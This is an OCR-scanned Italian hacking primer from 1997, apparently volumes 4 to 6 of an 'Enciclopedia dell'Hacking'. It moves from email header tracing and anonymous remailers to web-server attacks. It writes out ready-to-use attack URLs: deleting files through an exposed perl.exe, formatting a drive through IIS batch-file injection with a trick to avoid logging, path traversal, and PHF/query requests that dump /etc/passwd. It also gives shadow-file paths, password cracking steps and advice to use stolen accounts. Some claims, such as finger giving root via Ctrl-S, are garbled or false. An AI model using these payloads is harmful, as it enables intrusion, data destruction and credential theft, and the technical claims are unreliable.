(Properties, ovvero Proprieta’). Eudora ed altri client hanno una funzione 
simile a quella di Netscape Mail (nei menu). 


Prendiamo dunque ad esempio questa e-mail, di cui visualizziamo gli headers: 


Received: from posta.hackers.it (111.123.33.4) by provider.it via mtad (2.3) 
id mx03-Biqmta0276; Mon, 27 Sep 1997 06:45:07 -0600 (MDT) 

Received: from america.com ([123.45.67.89]) by posta.hackers.it 
(post.office MTA v1.9.3b ID# 0-12345) with SMTP id AAA187 
for <utente@ provider.it>; Mon, 27 Sep 1997 14:34:21 +0200 

From: <mittente@ america.com> 

To: <utente@provider.it> 

Subject: test... 


Analizziamone ora gli headers: il primo (Received) e’ lungo due righe, in 
quanto ogni header inizia con una parola chiave seguita dai due punti, e nel 
secondo rigo non esiste una prima parola, ne° i due punti; ne deduciamo 
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percio che eÈ il seguito della riga superiore. 


L'header "Received" ci informa del percorso seguito dall'e-mail da quando e 
stato generato a quando l'abbiamo ricevuto. Normalmente ce n'e piu di uno 
e sono disposti in ordine inverso (il primo rappresenta l'ultimo computer in 
cui e arrivata l'e-mail - con ogni probabilita’ il nostro o quello del 

nostro provider - e l'ultimo Received rappresenta il computer "mittente"). 
Infatti, ogni volta che un server riceve una e-mail, aggiunge un "Received" 
in *cima* alle altre intestazioni gia’ presenti. 


Tornando alla nostra e-mail, vediamo percio’ che l'ultimo "Received" ci 

informa che il computer america.com ha l'IP Address 123.45.67.89 e ha mandato 
questa e-mail al server posta.hackers.it usando SMTP. 

Guardando l'header successivo (sopra) notiamo che poi il messaggio e° stato 
mandato a sua volta da posta.hackers.it (che vediamo avere un IP Address pari 

a 111.123.33.4) a provider.it, che e° il server destinatario (il nostro). 

Infatti, se guardiamo l'header "To:" vediamo che destinatario finale e 
utente@provider.it. 

Il mittente, stando all'header "From:", dovrebbe essere mittente @america.com 
ma come sincerarsene? 


Utilizzando il programma Finger possiamo sapere se l'utente "mittente" esiste 
su "america.com", ma utilizzando Finger non possiamo sapere se sia stato 
effettivamente lui a mandare il messaggio o meno. 


Ricorriamo percio” ancora una volta all'analisi degli header "Received". 

Il primo header, quello che ci informa da CHI e stato inviato il messaggio, 
corrisponde all'ultimo header (cioe’ al secondo "Received"). 

Da li° scopriamo che il computer mittente e° america.com con IP 123.45.67.89 
e dell'IP possiamo essere sicuri... ma non possiamo fidarci di "america.com" 

e l'unico modo per sapere se effettivamente Host Name e IP Address coincidono 
e’ utilizzare un programma DNS. Bastera inserire l'IP Address per conoscere 
l'Host Name ad esso corrispondente. 


Questo metodo e’ di estrema importanza, in quanto se da un lato non ci 
permette di scoprire l'autore, almeno potremo sapere quale computer e stato 
usato per inviare e-mail, news, ecc. Molti provider di posta elettronica 
gratuita (come Hotmail e Netaddress) e non, permettono di bloccare l'invio 
di e-mail che provengono da un determinato "dominio" (es. provider.it), ma 
per farlo e° necessario conoscerne l'Host Name oppure l'IP Address. 


Quando si effettua un mail-bombing usando Kaboom, Up Yours o altri programmi 
del genere, si lascia dunque in modo indelebile il proprio IP Address nelle 

e-mail. L'unico "lato buono" e° che inviando alcune migliaia di e-mail a 

un indirizzo, *probabilmente* il proprietario della mailbox non riuscira’ a 
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scaricarle tutte (o non vorra’ farlo) e non potra’ percio” analizzarne le 
intestazioni per scoprire il colpevole ;) 

In ogni caso con i servizi di e-mail tramite Web, o con programmi ad hoc e 
possibile scaricare un singolo messaggio e analizzarlo, quindi e° bene 
lasciare il mail-bombing ai lamers che non hanno nient'altro da fare... 


Il motivo per cui programmi come Kaboom e Up Yours si dichiarano "100% non 
rintracciabili" e’ perche” la lista dei server SMTP inclusa in essi contiene 

per lo piu’ vecchi server che non registrano l'IP Address di chi si collega. 

Ma tali server sono stati sfruttati, hackerati, bombardati e sovraccaricati 

di e-mail in uscita, e sono stati percio’ disattivati o hanno cambiato nome. 

In ogni caso, tutti 1 piu nuovi server SMTP registrano (purtroppo) l'IP e 

in alcuni casi sono addirittura in grado di riconoscere un tentativo di 

FakeMail e rispondere "sfottendo"... :-} 


Supponiamo ora che anziche utilizzare e-mail false vogliamo scriverne una 
anonima per rispondere a qualcuno senza essere rintracciati, o magari per 
partecipare a un Newsgroup in maniera del tutto anonima. 


Esiste un servizio, quello dei cosiddetti "remailer", per inviare posta 
completamente anonima (senza mittente e senza alcuna traccia di IP Address o 
altro). 


NOTA: Per una lista completa con tutte le informazioni come: velocita’, 
caratteristiche e affidabilita” basta cercare le parole "anonymous remailer" 
con un qualsiasi motore di ricerca sul Web. 


Usarli nella loro forma piu’ semplice (senza criptazione e senza re-routing 
multipli) e° facile, basta inviare una normalissima e-mail (con qualsiasi 
programma di posta elettronica) all'indirizzo e-mail di un remailer. 

Ad esempio, remailer@replay.com (oppure remailer@huge.cajones.com o ancora 
remailer@cypherpunks.ca) e, PRIMA del messaggio inserire una riga vuota, una 
coppia di due punti e altre informazioni, come segue: 


Request-Remailing-To: destinatario @email.com 
Questa e’ una prova... 


Dunque l'indirizzo del destinatario NON va inserito come destinatario. 
Come destinatario useremo l'indirizzo del remailer, mentre quello del vero 
destinatario andra’ scritto a fianco a "Request-Remailing-To". 


Questo e° quanto per le e-mail anonime. Come fare, invece, per inviare 
delle news anonime? Seguendo lo stesso procedimento, ma usando come 
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destinatario un "gateway" (passaggio) mail-news. A cosa serve? 

Inviando un messaggio al gateway, questo lo inviera’ a sua volta alle news. 
Volendo mandare un messaggio al Newsgroup alt.hackers bastera* sostituire 
i punti con dei trattini e aggiungere l'indirizzo del gateway (ad esempio 
cs.utexas.edu) quindi il risultato sara’ alt-hackers@cs.utexas.edu al quale 
manderemo il nostro messaggio tramite remailer. 


Aggiungiamo ora alcune informazioni per completare il capitolo. 

Sul Web esistono vari siti per FakeMail che non registrano IP Address. Uno 
molto veloce e’ (al momento in cui si scrive) MailMan al seguente indirizzo: 
http://www.nettex.com/-thecap/ 

Per quanto riguarda la posta anonima tramite remailer, ne esistono anche sul 
Web. Per chi preferisse le Form ai programmi di posta elettronica bastera® 
cercare, come detto prima, dei remailer usando i motori di ricerca. 

Un indirizzo tra i piu affidabili: http://www.replay.com/remailer/ 

NOTA: questi siti sono attivi non per arrecare danni, ma per fornire un 
servizio a quanti vogliono preservare la propria privacy elettronica. 
Abusandone potreste mettere voi nei guai, o causare la chiusura del servizio. 


Inoltre molti remailer possono negarvi l'accesso al servizio in caso di 
proteste da parte di terzi. In altre parole, usate il cervello... 


Copyright (C) 1997 by 
:: LORD SHINVA :: 
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INTRODUZIONE ALLE TECNICHE DI BASE 

Le tecniche che inizieremo a vedere da questo capitolo in poi sono quelle 
di base per poter comprendere quelle piu’ complesse. 

Inoltre nella spiegazione di ciascuna tecnica ne approfittero° per spiegare 
altri argomenti che normalmente in qualsiasi guida sull'hacking, in italiano 
o in inglese, sono lasciati alla... immaginazione del lettore. 


Dunque. In questo volume vedremo delle semplici tecniche relative alla 
sicurezza (da un punto di vista hacker) dei server Web. 


Credo (e spero) che sappiate gia’ usare un browser e i vari programmi... in 
caso contrario vi consiglio vivamente di lasciar perdere l'hacking e iniziare 
con qualcosa di piu” semplice, come accendere e spegnere il computer... 


TECNICHE DI BASE: I WEB SERVER - PARTE 1 

Molti metodi usati in passato per hackerare un sito Web si basavano su dei 
problemi di sicurezza pre-esistenti causati dalla scarsa competenza dei 
Webmaster e dei SysAdmin. Ad esempio, un classico errore era lasciare 
programmi che hanno funzione di interpreti di comandi, come ad esempio il 
Perl (file perl.exe) accessibili a chiunque tramite Internet. 

Dal momento che tali programmi accettano parametri, se avessimo voluto 
cancellare l'intero contenuto di una directory avremmo potuto eseguire il 
comando di eliminazione semplicemente collegandoci all'URL (indirizzo Web). 


Nel nostro esempio, dal momento che il linguaggio in questione e’ il Perl, 
il comando per eliminare la directory e’ "unlink <*>" (senza gli apici). 
Per "dire" al Perl di eseguire un comando va usata l'opzione "-e". Il 
comando completo sara’ quindi: perl.exe -e unlink <*> 


Ora supponiamo che il povero Webmaster :) abbia lasciato perl.exe nella 
directory cgi-bin (dove si trovano quasi tutti i programmi usati su un sito). 
Non dovremo fare altro che collegarci dal nostro browser a questo indirizzo: 
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http://www.nomesito.com/cgi-bin/perl.exe?-e+unlink+%3C*%3E 


Ecco cosa stiamo facendo: http://www.nomesito.com/cgi-bin/perl.exe non e 
altro che l'indirizzo del programma da eseguire; il punto interrogativo ci 
consente di passare dei comandi qualsiasi al programma (probabilmente lo 
avrete gia’ visto quando vi collegate ai motori di ricerca); infine, come 

gia’ detto prima, "-e" dice al Perl di eseguire il comando che segue. 

I segni + non sono altro che gli spazi. Poiche” negli URL non si usano spazi 
vanno usati i + al loro posto. 


Ora troviamo la parola unlink, un altro + (spazio) e poi %3C*%3E ...c0s'e? 
Se guardate piu’ sopra, vedrete che il comando da eseguire era unlink <*> 
Non abbiamo fatto altro che sostituire < con il suo codice ASCII in notazione 
esadecimale (3C preceduto da % per indicare che e’ un codice ASCII) e lo 
stesso abbiamo fatto per > mentre l'asterisco e° rimasto uguale. 

Ovviamente non dovrete imparare i codici a memoria, vi bastera’ trovare una 
tabella ASCII come quelle che si trovano sui libri di informatica e di 
programmazione, o in alcune piccole utility. Se non l'avete, prima di 
proseguire e. assolutamente necessario che ve la procuriate. 


Dicevamo... perche° questi cambiamenti? 

Perche” esistono delle regole per "scrivere" un URL: caratteri come / e \ 

(detti slash e backslash), le parentesi e le virgolette, gli spazi e quasi 

tutta la punteggiatura in genere (ad esclusione di + - e pochi altri simboli) 
vanno *sempre* sostituiti con il relativo codice ASCII. Tutti gli altri 

caratteri possono rimanere invariati. 

Dunque quando dovremo scrivere uno dei simboli sopra descritti non bisognera® 
fare altro che cercarne il codice in esadecimale e scriverlo al suo posto, 
mettendo un simbolo di percentuale prima del codice. 

Tali codici sono detti di "escape". 


In modo analogo, un server Web come il Microsoft IIS per Windows (versioni 
dalla 1.x alla 2.0b) oppure il server di Windows NT 3.x puo” essere "forzato" 
ad eseguire dei comandi arbitrari, come ad esempio: 


http://www.nomesito.com/cgi-bin/scrivimi.bat?&dir+c:\+%5Cs 


In questo caso scrivimi.bat e’ un file batch (.bat). 

E° molto facile da scoprire se un server utilizzi tali file, in quanto basta 

dare un'occhiata alle pagine Web di un sito (e magari al loro listato) per 
scoprire se vi sono riferimenti ad essi. 

Ovviamente il trucco funziona solo con i server sopra elencati (per Windows) 
e con pochissimi altri. Inoltre le nuove versioni hanno corretto questo 
problema. 
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Il "bug" (errore) in questo caso risiede nella gestione dei files batch. 

Come vediamo, aggiungendo ?& al nome del file e poi scrivendo i comandi da 
eseguire, il server credera’ di stare eseguendo ancora il file batch e in 

realta° fara’ ben altro... nel nostro caso, il comando codificato e il 

seguente: dir c:\/s (dove / e° stato sostituito con il suo codice, %SC). 

Avremo quindi come risultato di tale comando l'elenco completo di *tutte* le 
directory e i file presenti sul server (utile per sapere dove mettere le 

mani se cerchiamo qualcosa in particolare o vogliamo modificare qualcosa). 


Quelle descritte non sono vere e proprie tecniche hacker: sono degli exploit 
per poter sfruttare i problemi di sicurezza conosciuti a nostro vantaggio. 

Le trattiamo anche perche non si puo imparare qualcosa di complesso senza 
conoscere le basi e i ragionamenti che sono dietro un exploit. 


Tali exploit sono ampiamente discussi e spiegati (in inglese) su Internet e 

a volerli spiegare tutti non basterebbero 100 volumi di questa enciclopedia. 
Ecco perche’ vi invito fin d'ora ad "avventurarvi" sulla Rete, a cercare e a 
provare... e soprattutto a imparare l'inglese (se non lo conoscete gia), 

perche’ la stragrande maggioranza delle documentazioni e dei siti che possono 
insegnarvi qualcosa (come il mitico Silicon Toad... http://www.silitoad.org 
oppure come Hackers Underground... http://www.underground.org) e’, che lo 
vogliate o meno, in inglese. In una parola: LEGGETE. 


Comunque l'obiettivo di questi volumi non e certo insegnarvi dei trucchi. 
Possono essere molto utili, talvolta indispensabili. Ma l'hacking e° ben 
altro, e si avvale dell'uso di tecniche raffinate che l'hacker sceglie in 

base alle proprie esigenze e in base al suo personale modo di hackerare. 


Se noteremo abbastanza interesse da parte vostra, l'autore (cioe 10, Lord 
Shinva) continuero’ a scrivere questi volumi e presto conto di poter iniziare 
con l'hacking propriamente detto. Se invece li considerate una perdita di 
tempo, ne interromperemo la pubblicazione. 


Per chi voglia comunicarci la propria opinione in merito, l'indirizzo di 


e-mail e° Lord.Shinva@usa.net (consigli, critiche, richieste di argomenti 
da trattare e proposte di collaborazione sono bene accetti). 


Copyright (C) 1997 by 
:: LORD SHINVA :: 


-Digital Alliance Confederation- 
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VAI AL VOLUME 5 
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GÌ Lord Shinva 
e) -DiGITAL::ALLIANCE- 


C:0.N:F.E:D.E:R.A:T.i:0.N 
Enciclopedia dell' Hacking 
Volume 5 


TECNICHE DI BASE: I WEB SERVER - PARTE 2 

Come abbiamo visto, molti server Web per Windows (come Microsoft IIS oppure 
Windows NT server) possono essere utilizzati per eseguire comandi arbitrari 
utilizzando lo schema seguente: 


[URL].../nomescript.bat?&comando_1+comando_2+...+comando_N 


E° bene notare che i server Web registrano in uno o piu’ file (detti "log") 
tutte le operazioni effettuate, e quindi nel caso utilizzassimo l'hack sopra 
descritto esso verrebbe senza dubbio registrato, insieme al nostro IP Address 
e ad altre informazioni. 


Per evitarlo, possiamo fare due cose. Una possibilita” e aggiungere alla 
fine dell'URL contenente i nostri comandi, il comando "time" oppure "date", 
in questo modo: 


http://www.sito.com/cgi-bin/prova.bat?&echo+S+%7C+format+c%3A+%2Fu+time 
Procediamo ora con la spiegazione di questo URL. Il comando eseguito e: 
echo S | format c: /u 


seguito dal comando "time", che vedremo dopo. Il comando "format c:" come 
sappiamo serve a formattare un disco, in questo caso l'hard disk "C", mentre 
"/u" indica a "format" di procedere con una formattazione incondizionata, 
cioe’ senza salvare i dati presenti sul disco... ma "format", una volta 
eseguito, chiede all'utente di premere un tasto: S (s1) oppure N (no), e 

non fara’ nient'altro fino a che non avra’ uno dei due input. 

Per ovviare all'inconveniente, non potendo noi digitare "S" sulla tastiera 

del computer che vogliamo hackerare, utilizziamo "echo S" seguito da "|". 
In pratica "|" (detto "pipe") serve ad inviare l'output del comando "echo" 

(il carattere "S") al comando successivo (format), simulando la pressione del 
tasto. Abbiamo cosi risolto il problema. 


Una funzione non documentata del comando format e’ l'opzione "/autotest". 
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Tale opzione corrisponde in pratica alla riga di comando sopra descritta, 

e quindi potremo (solo nel caso di format) fare a meno di echo, pipe e "/u" 
scrivendo "format c: /autotest" (NON scrivetelo sul vostro computer). 
L'hard disk verra’ formattato senza chiedere alcunche’ all'utente. 


Ma ora torniamo al comando time (oppure date). Perche l'abbiamo aggiunto? 


I server registrano le operazioni nei log solo DOPO che tali operazioni siano 
state effettivamente eseguite. Ad esempio, quando un URL viene "chiamato" e 
abbiamo ricevuto il contenuto della pagina ad esso associata. 

Per impedire al server di terminare l'operazione (e quindi di registrare 

l'URL hackerato e il nostro IP nel file di log) usiamo quindi time o date. 

Come sappiamo questi due comandi non fanno altro che cambiare ora o data, e 
a tale scopo chiedono all'utente il nuovo valore (l'orario, nel caso di time) 
all'utente. Ma dal momento che il server non sa rispondere ai comandi ;) 

la loro esecuzione non potra’ essere completata, il log non verra’ scritto 

e noi avremo ottenuto quello che volevamo... segretezza :) 


Vi ho detto pero che esistono DUE modi. Ecco il secondo: esiste su Internet 
un server molto simile all'Anonimizzatore di cui vi ho parlato in un volume 
precedente a questo. Si tratta di IPROXY (http://www.iproxy.com), un server 
che offre gratuitamente la possibilita’ di collegarsi anonimamente ai siti, 
digitando l'URL desiderato (vi dice niente?). 

Non e’ ovviamente una tecnica, ma un servizio pensato per ben altri scopi 

che per l'hacking... ma meglio uno in piu’ che in meno ?_4 


Tornando ai problemi di sicurezza... 


Un altro bug di IIS e’ il seguente: aggiungendo uno (o una coppia) di punti 
alla fine di un file script, anziche’ essere eseguito, il contenuto del file 
verra’ visualizzato sullo schermo del vostro browser. Un altro bug simile 
permette di visualizzare file "segreti" (come pagine protette da password, 
documenti che non dovrebbero poter essere visualizzati in quanto "interni" 
e qualsiasi altro file presente sull'hard disk del server), in questo modo: 


http://www.sito.com/..\..\..\..\qui_va_il_percorso\nome_del_file 


Esistono molti altri bugs, per i quali vi rimando (nel caso di Windows) ai 
siti sulla sicurezza di Windows. 


Passiamo ora agli altri Web server. 
Restando in tema di Windows NT/95 un altro server che ha il problema degli 


script in cgi-bin e O'Reilly WebSite (versioni fino alla 1.1b). 
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Per leggere invece un file log (WebSTAR.LOG) del server WebStar per Macintosh 
basta utilizzare il codice escape al posto del punto (nel nome del file): 


http://www.sito.com/WebSTAR%20LOG 


Tenete presente che i bug fin qui descritti sono applicabili solo ai relativi 
software. Non cercate, pertanto, di utilizzare "time" con un server Unix 0 
roba del genere. 


TECNICHE DI BASE: I WEB SERVER UNIX 


I I I I I 


Il Web server standard di Unix, Linux, ecc. e httpd della NCSA. 


Tutte le versioni fino alla 1.4 hanno un bug molto frequente nel software 
server (lo ritroveremo ad esempio nei server SMTP, vecchi e nuovi). 

Si tratta di un problema detto "buffer overflow", che consiste nel riempire 
tutta l'area di memoria riservata dal server ai dati, e fargli eseguire un 
programma (molto piccolo, e preferibilmente in assembler) scritto da noi. 
Essendo una tecnica molto complessa la vedremo piu’ avanti, poiche’ ci sara” 
piu utile con SMTP (per avere accesso root) che con il Web, in quanto nei 
nuovi server questo problema sembra essere stato corretto. 

Per la cronaca, lo stesso bug esiste anche nel server Apache (fino alla 
versione 1.02). 


Esistono poi degli hack (un "hack" e° una tecnica di hacking) che hanno 
letteralmente fatto storia. 

Relativamente vecchio ma ancora molto utilizzato e’ quello del PHF, usato 
per hackerare le pagine Web di CIA, FBI e moltissimi altri, più o meno 
famosi. Prima di spiegare questa tecnica e’ bene precisare una cosa: se 

state leggendo questi volumi per imparare, non avrete certamente la capacita” 
di rendervi "invisibili" agli occhi di un SysAdmin... quindi attenti a non 
utilizzare queste tecniche. 

Molti siti (come ad esempio unina.it, l'Universita’ di Napoli) hanno software 
in grado di riconoscere gli hack piu° conosciuti (tra cui PHF e Query). 
Potrebbero far sospendere il vostro account Internet, se non denunciarvi... 


Ma prima dobbiamo fare un breve corso sul sistema di password di Unix. 


TECNICHE DI BASE: UNIX E LE PASSWORD 


III I I 


Riflettiamo un attimo: qual'e’ la parte piu’ interessante di un sistema 
Unix (o Linux) ? Certamente 1l file delle password, nel quale si trova, in 
forma criptata, anche la password di root (oltre a quelle di tutti gli altri 
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utenti). 


Una classica entry (riga di testo contentente dati) di un file password e 
di questo tipo: 


username:4cFJg5SaMKkC9f:1000:20:nome e cognome:/home/utente:/bin/ksh 


I campi sono delimitati dai due punti, e sono: 
- Nome utente (username) 
- Password criptata 
- Numero utente 
- Numero gruppo 
- GECOS (nome e cognome, oppure altre informazioni sull'utente) 
- Directory utente (dalla quale in genere non potete uscire) 
- Shell utilizzabile dall'utente (in genere limitata se non siete root) 


nel caso in cui uno o piu° campi siano disabilitati, li troverete vuoti (1 
due punti saranno vicini) oppure troverete uno slash (/) al loro posto. 
Nel caso della shell, in alcuni casi troverete /bin/false che, in pratica, 
corrisponde allo slash (e quindi a nessuna shell). 


Ma dove si trova il file delle password? 


La directory standard e’ /etc e il file si chiama passwd, quindi il percorso 
completo sarebbe /etc/passwd ma la maggior parte dei nuovi sistemi ha un 
meccanismo denominato "shadowing" delle password. Per evitare di prelevare 
il file contentente le password, infatti, viene creato un secondo file, il 

cui nome in genere e shadow (in molti casi si trovera’ nella directory /etc) 

che contiene, in forma un po diversa da quella appena vista, tutti i campi, 
comprese quindi le password (criptate), e NON e° accessibile agli utenti. 

Il file passwd, invece, conterra’ tutti i soliti campi, ma al posto della 

password conterra’ un simbolo, detto Token (che in genere e un asterisco). 


Perche’ questo? Le password sono criptate, ma e’ ancora possibile risalire 
ad esse, crackarle (da "crack"). Non si possono decriptare, ma si puo’ usare 
una lista di parole probabili (detta dizionario), criptarle una per una e 
confrontare il risultato con le password criptate in passwd. Se coincidono, 
abbiamo trovato una password. 

Ovviamente per fare tutto cio’ si usano dei programmi appositi. I piu usati 
(e i migliori) sono CrackerJack e HellFire Cracker. Praticamente tutti i 

siti Web contenenti materiale per hackers ne hanno una copia. 


Tornando alle password, se un sistema usa lo shadowing, per risalire al vero 
file delle password, in base al sistema operativo usato potremo trovarlo in 
directory differenti, come mostrato in questa tabella tratta dalla HackFAQ: 
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Sistema Unix Path (percorso) del file Token 


AIX 3 (caso 1) letc/security/passwd 
AIX 3 (caso 2) /tcb/auth/files/p/pippo # 


A/UX 3.0s Itcb/files/auth/?/ * 
BSD4.3-Reno /etc/master.passwd 7 
ConvexOS 10 /etc/shadpw Ù 
ConvexOS 11 /etc/shadow 

DG/UX letc/tcb/aa/user/ - 

EP/IX /etc/shadow x 

HP-UX /.secure/etc/passwd È 

IRIX 5 /etc/shadow x 

Linux 1.1 /etc/shadow n 

OSF/1 /etc/passwd[.dir|.pag] * 

SCO Unix #.2.x /tcb/auth/files/p/pippo ù 
SunOS4.1+c2 letc/security/passwd.adjunct  ##username 
SunOS 5.0 letc/shadow si 
System V Release 4.0 /etc/shadow x 
System V Release 4.2 /etc/security/* database Ù 
Ultrix 4 /etc/auth[.dir|.pag] Ù 
UNICOS letc/udb ii 


Ora che sappiamo cosa cercare (e dove), passiamo alle tecniche da impiegare. 


Un file /etc/passwd standard puo spesso essere prelevato tranquillamente 
con FTP oppure collegandosi ad un indirizzo come: 


http://www.sito.com/ftp/etc/passwd 
oppure... 
ftp://ftp.sito.com/etc/passwd 


tenendo pero” presente che in genere i SysAdmin leggono 1 log... scaricando 

il loro file delle password non li farete certo felici. 

Quindi, non appena riuscirete a procurarvi username e password di un account 
(che non sia ne’ vostro ne’ di amici, se ci tenete alle amicizie...) e 
consigliabile utilizzare quello anziche’ il vostro account. 


Una volta prelevato /etc/passwd diamogli un'occhiata: se il secondo campo di 
ciascun rigo (o di almeno un paio di essi) contiene una password criptata, 
possiamo essere quasi sicuri che non esista nessuno shadowing. 

Dico *quasi* perche’ alcuni grossi server stranieri hanno recentemente usato 
dei file passwd fittizi. Crackandoli e provando a collegarsi con le password 
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trovate, non si riesce a collegarsi... perche sono tutte false e servono a 
depistare l'hacker inesperto. E° raro che accada, ma e da tener presente. 


Nel caso dovessimo trovare un Token al posto della password, ci affideremo 
alle tecniche di cui parlavamo in principio. 


Il primo hack che descriveremo e quello del PHF. 


PHF e una piccola utility di "agenda telefonica" presente in Unix, Linux, 
ecc. Anch'essa puo’ essere usata in modo sovversivo, per far eseguire dei 
comandi qualsiasi a un server. 


Basta collegarsi a un URL del genere: 
http://www.sito.com/cgi-bin/phf?Jserver=x&Qalias=x%0A/bin/cat%20/etc/passwd 

oppure piu’ semplicemente... 
http://www.sito.com/cgi-bin/phf?Qalias=x%0A/bin/cat%20/etc/passwd 


usando /etc/shadow (o altri, vedi tabella sopra) al posto di /etc/passwd 
per "prelevare" il vero file delle password. 


Quello che avviene "chiamando" questi URL e che il file PHF viene eseguito 
(vengono passati parametri fittizi, come Jserver e Qalias) e poi si simula 

un invio a capo (codice %O0A) per inviare un nuovo comando, che nel nostro 
caso e /bin/cat /etc/passwd (%20 equivale allo spazio, ma si puo usare 
anche "+" al suo posto), ma puo essere *qualsiasi* comando si voglia. 


In quel momento, infatti, abbiamo accesso root! =) 
E come tali, possiamo eseguire comandi, creare, modificare, distruggere... 


NOTA: il file /bin/cat equivale al comando "type" del DOS. Serve quindi a 
visualizzare un file, e occasionalmente anche a crearne uno o ad aggiungere 
righe di testo ad uno pre-esistente. Supponiamo di voler inserire una riga 
nel file "prova": in tal caso, useremo "cat" unitamente ai simboli di 
ridirezione > e >> e | (pipe), proprio come nel DOS. 

Alcuni esempi: 


/bin/cat prova > test crea un file col nome test e vi scrive "prova" 
/bin/cat prova >> test aggiunge la parola "prova" al file "test" 


Ovviamente per crackare un file shadow che, come abbiamo detto, usa un 
formato differente, dovremo prima effettuare il de-shadowing (trasformare 
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shadow in formato passwd standard) e poi effettuare il cracking con i 
normali CrackerJack e simili. 
Esistono su Internet programmi appositi per tale operazione. 


Una tecnica molto simile a quella del PHF e° quella del Query: 
http://www.sito.com/cgi-bin/query?%0A/bin/cat%20/etc/passwd 


che funziona in modo analogo a quello gia’ visto del PHF. 

Dopo il "?" andrebbe inserito qualcosa da richiedere al server, ma poiche 
a nol interessa solo eseguire comandi, ci "limiteremo" ancora una volta a 
scriverli dopo il codice %0A. 


Un'ultima cosa che puo tornarci utile e) che molti server hanno un file 
chiamato test-cgi nella directory cgi-bin. Se tale file contiene il comando: 


echo QUERY_STRING = $QUERY_STRING 


potremo, ad esempio, dare un'occhiata alla directory di root ("/*") con il 
seguente URL: 


http://www.sito.com/cgi-bin/test-cg1?/* 


o della directory corrente usando solo "*" anziche’ "/#", e così” via. 


POSTILLA 

Che lo si creda o meno, nonostante queste tecniche siano abbastanza vecchie e 
utilizzatissime, sono parecchi 1 server (anche quelli "importanti") che sono 
vulnerabili. Spesso inoltre non registrano neppure l'IP Address dell'hacker. 
Ovviamente se il server vi risponde qualcosa come "il tuo tentativo di 
hackerare questo server sara” comunicato a chi di dovere" (in inglese) state 
pur certi che vi troverete nei guai. Quindi aspettate di diventare hackers 
prima di mettere in pratica... conoscere le tecniche non basta. Se credete 

di essere gia’ diventati hackers conoscendole, mi dispiace deludervi... vi 
potrete solo mettere nei guai e farvi etichettare per sempre come patetici 
"lamer" (termine dispregiativo del gergo hacker per indicare un hacker nato 
perdente). 


Ancora alcune lezioni sulle tecniche di base per gli altri tipi di servizi 

(FTP, SMTP, IRC, ecc.), e potremo iniziare con l'hacking. Sara necessario 
conoscerle bene perche’ non torneremo piu’ su tali argomenti, a meno che non 
sia necessario aggiungere qualcosa. 
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Enciclopedia dell' Hacking 
Volume 6 


TECNICHE DI BASE: MISCELLANEA 
Nel volume precedente abbiamo visto come sfruttare alcuni problemi di 
sicurezza del software server. 


Dal momento che e° necessario conoscere tipo e versione del software e 
sistema operativo, dobbiamo sapere come avere tali informazioni. 


Ancora una volta ci torna comodo utilizzare Telnet. Bastera” infatti 
collegarsi alla porta del servizio interessato per ottenere quasi sempre 
informazioni preziose. 


Ad esempio, se ci colleghiamo alla porta HTTP, FTP o SMTP, il server ci 
"salutera’" indicandoci tipo e versione del software, data locale e altre 

utili informazioni. 

Altre ancora possiamo ottenerle tramite il programma "finger", che serve a 
mostrare informazioni su un dato utente di un dato sistema. 

Alcuni siti inoltre ci risparmiano la fatica di cercare: infatti, i Webmaster 
dopo aver acquistato un "potente" software server, scrivono orgogliosi sulle 
loro pagine "questo sito utilizza il software xxxxx versione yyyyy"... 


Un'ulteriore nota sulla porta HTTP: i vecchi server (versioni fino alla 1.3) 
di httpd (per Unix e Linux) possono essere crashati richiedento un URL con 
un formato sbagliato. Esistono in giro diversi exploit sull'argomento, e 
pertanto vi rimando alle mailing list sulla sicurezza su Internet. 


NOTA: da ora in poi quando parlero’ di Unix mi riferiro© anche a Linux, AIX, 
Solaris, ecc. a meno che sia diversamente specificato. 


Prima di procedere vorrei farvi notare che non e° necessario scrivere in 

tempo reale i vostri comandi in Telnet (anche perche’ correte il rischio di 
sbagliare e non poter cancellare). Moltissimi client hanno le funzioni Copy 

e Paste (Copia e Incolla), che potete usare unitamente a un programma di 
videoscrittura (come il Block Notes di Windows) per velocizzare le operazioni 
(e ridurre il numero di cifre sulla vostra bolletta telefonica). 
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Vi bastera’ infatti scrivere tutti i comandi nel block notes, usare Copy e 
poi, una volta in Telnet, usare Paste. Un consiglio: non usate testi troppo 
lunghi, perche alcuni server potrebbero non essere abbastanza veloci per 
riceverli. 


Altri programmi vulnerabili a un attacco tramite Telnet sono Finger, Ping, 
Gopher, Pine e altri; in pratica, per quasi tutti quelli esistenti esiste 
un hack su misura. 


Ovviamente per capire di cosa sto parlando vi serviranno i programmi in 
questione. Iniziamo da finger. 


Usando @ oppure 0 (o uno degli username standard come root, bin, ftp, system, 
demo, guest, ecc.) nell'effettuare una richiesta tramite finger e’ possibile 
ottenere (specie con i vecchi server) svariate informazioni. 


Ma supponiamo ora di voler crashare il server finger. Per quale motivo? 
Siamo tutti hackers.malicious o crackers? ;) No, il motivo eÈ un altro: 

se il server finger (per Unix) dovesse crashare, noi avremmo accesso root. 
Perche? Se il server crasha, non avremo piu’ un "interprete" dall'altra 
parte che "filtra" 1 nostri comandi e ci da informazioni quando scriviamo 
finger... ma avremo una specie di connessione diretta alla shell dei comandi 
con il livello d'accesso massimo (root, per l'appunto). 


Ecco come si fa: (non sbavate, siamo ancora al principio ;) 

utilizzando Telnet, il cui scopo e fornire una connessione e lasciarla nelle 
nostre mani, ci colleghiamo alla porta 79 (finger) del server desiderato 
(assicuriamoci pero prima che il sistema operativo sia effettivamente Unix e 
che abbia il server finger attivato). 

Ora, quello che fa un normale client finger e semplicemente inviare il 
comando "finger nomeutente" e visualizzare le informazioni ricevute. 
Nient'altro. E° uno spreco... tanto potere buttato al vento =) 

E pensare che finger ha anche accesso a tutte le directory degli utenti, e 

a saperlo controllare si potrebbero anche "ritoccare" i vari files... 


Ma noi, che abbiamo ben altre intenzioni (buone... lo dico per il NOPT, il 
Nucleo Operativo di Polizia Telematica ;) possiamo fare di meglio. 


Scrivendo ///* seguito dalla combinazione Ctrl-S accederete a root e 
paralizzerete il server (Ctrl-S e° un codice di controllo detto "freeze", 
cioe. "congela"). A questo punto la connessione e’ in mano vostra. 


Il client finger puo essere usato per un attacco di tipo D.O.S. (Denial Of 
Service, cioe’ negare l'accesso a un servizio disattivandolo). 
Se usiamo finger per collegarci a un server troppe volte (lasciando "aperta" 
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ogni connessione) dopo un po il server rifiutera’ a chiunque altro di 
collegarsi, e l'intero server del sito verra’ rallentato; in alcuni casi 

potrebbe addirittura crashare. 

Per fare una cosa del genere bisognerebbe chiamare decine di volte lo stesso 
